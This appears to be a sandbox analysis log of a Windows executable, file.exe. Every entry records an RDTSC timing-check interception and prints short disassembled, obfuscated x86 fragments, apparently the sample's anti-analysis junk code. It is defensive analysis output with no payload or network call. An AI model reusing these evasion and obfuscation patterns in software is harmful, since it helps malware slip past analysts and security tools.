Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41616 second address: C4162D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F00646A437Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4162D second address: C41664 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jc 00007F0064E57026h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0064E57036h 0x00000013 jmp 00007F0064E57033h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41823 second address: C41827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41827 second address: C4182B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41969 second address: C41975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F00646A4376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41AB9 second address: C41ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44983 second address: C44990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44990 second address: C44994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44994 second address: C449A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44C39 second address: C44C43 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0064E5702Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44C43 second address: C44C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F00646A4388h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C453FB second address: C45445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F0064E57028h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 nop 0x00000028 pushad 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F0064E57037h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C45445 second address: C45462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C469CD second address: C469D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C469D1 second address: C46A0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F00646A4378h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 cmc 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D1A8Fh], edi 0x0000002d push eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push ebx 0x00000032 pop ebx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46A0C second address: C46A1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F0064E57026h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47B7D second address: C47B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47B81 second address: C47B92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0064E57026h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A609 second address: C4A669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F00646A4378h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 je 00007F00646A4376h 0x0000002a push 00000000h 0x0000002c sub dword ptr [ebp+122D1FCAh], esi 0x00000032 push 00000000h 0x00000034 cmc 0x00000035 and di, 9FEDh 0x0000003a xchg eax, ebx 0x0000003b jmp 00007F00646A4384h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A414 second address: C4A427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0064E5702Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A669 second address: C4A66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A66D second address: C4A671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A671 second address: C4A677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A677 second address: C4A67C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A67C second address: C4A682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B154 second address: C4B1B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57030h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0064E57037h 0x0000000f nop 0x00000010 jmp 00007F0064E5702Bh 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 jmp 00007F0064E57036h 0x0000001d pop esi 0x0000001e push 00000000h 0x00000020 mov di, bx 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 jg 00007F0064E57026h 0x0000002d pop ecx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF57DF second address: BF57EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F00646A4376h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF57EA second address: BF57F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0064E57026h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF57F5 second address: BF57FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF57FD second address: BF580A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F0064E5702Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF580A second address: BF581A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F00646A4376h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF581A second address: BF5826 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5826 second address: BF582A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF582A second address: BF5832 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF5832 second address: BF5839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50328 second address: C5032E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5032E second address: C5033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5033A second address: C5033E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5094A second address: C5094F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5094F second address: C509AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jno 00007F0064E57038h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 je 00007F0064E5702Ch 0x00000019 and edi, dword ptr [ebp+122D215Ch] 0x0000001f push 00000000h 0x00000021 sub ebx, 5D836F9Ah 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b jmp 00007F0064E57033h 0x00000030 pop edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C509AA second address: C509B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F00646A4376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C52868 second address: C52874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0064E57026h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C52874 second address: C528AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F00646A4389h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C566A0 second address: C56722 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0064E57028h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F0064E57028h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov bx, 721Ch 0x0000002b mov edi, dword ptr [ebp+122D56E1h] 0x00000031 push 00000000h 0x00000033 mov edi, ebx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F0064E57028h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 mov ebx, dword ptr [ebp+122D214Fh] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F0064E57034h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5686C second address: C5687E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jng 00007F00646A4384h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5687E second address: C56882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C587F9 second address: C58823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F00646A4381h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F00646A4376h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58823 second address: C58884 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, eax 0x0000000a push 00000000h 0x0000000c add dword ptr [ebp+122D1D31h], ecx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F0064E57028h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jno 00007F0064E57036h 0x00000034 xchg eax, esi 0x00000035 jmp 00007F0064E5702Fh 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58884 second address: C58888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59842 second address: C59848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C589D1 second address: C589D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C589D5 second address: C589D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C589D9 second address: C589E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C589E3 second address: C589E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D7FF second address: C5D803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D803 second address: C5D888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0064E5702Ah 0x0000000b popad 0x0000000c nop 0x0000000d xor dword ptr [ebp+122D1FDEh], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F0064E57028h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f jmp 00007F0064E5702Fh 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+12446733h], ebx 0x0000003c xchg eax, esi 0x0000003d push ebx 0x0000003e jo 00007F0064E57037h 0x00000044 jmp 00007F0064E57031h 0x00000049 pop ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F0064E57037h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E73E second address: C5E7A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F00646A437Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F00646A437Fh 0x00000010 nop 0x00000011 jmp 00007F00646A4384h 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D1ABBh] 0x0000001e push 00000000h 0x00000020 mov ebx, edi 0x00000022 xchg eax, esi 0x00000023 jns 00007F00646A4381h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F00646A437Dh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C60797 second address: C6079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6079C second address: C607A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F7FC second address: C5F806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0064E57026h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C61682 second address: C61686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C61686 second address: C6168C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6168C second address: C616D6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F00646A437Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F00646A4378h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov ebx, esi 0x00000029 push 00000000h 0x0000002b mov ebx, edi 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D1BEAh] 0x00000035 xchg eax, esi 0x00000036 push ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jl 00007F00646A4376h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C616D6 second address: C616E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F0064E57026h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C60933 second address: C60938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C616E8 second address: C616EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C60938 second address: C60959 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F00646A437Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F00646A437Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C616EE second address: C616F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C60959 second address: C6095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C667CE second address: C667D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C667D5 second address: C667FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F00646A437Ah 0x00000011 jmp 00007F00646A4380h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C667FB second address: C66815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57030h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0064E57026h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C66815 second address: C66819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA910 second address: BFA914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B671 second address: C6B679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6ADE1 second address: C6ADFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Ah 0x00000007 jmp 00007F0064E5702Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75BDC second address: C75BEC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F00646A4376h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75BEC second address: C75BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C76021 second address: C7602D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F00646A4376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7602D second address: C76031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C76031 second address: C76035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C765A5 second address: C765AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C765AB second address: C765C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4386h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C9D1 second address: C7C9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C9D5 second address: C7C9F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82B46 second address: C82B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82B4B second address: C82B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4382h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F00646A4376h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82B67 second address: C82B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82C9B second address: C82CA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
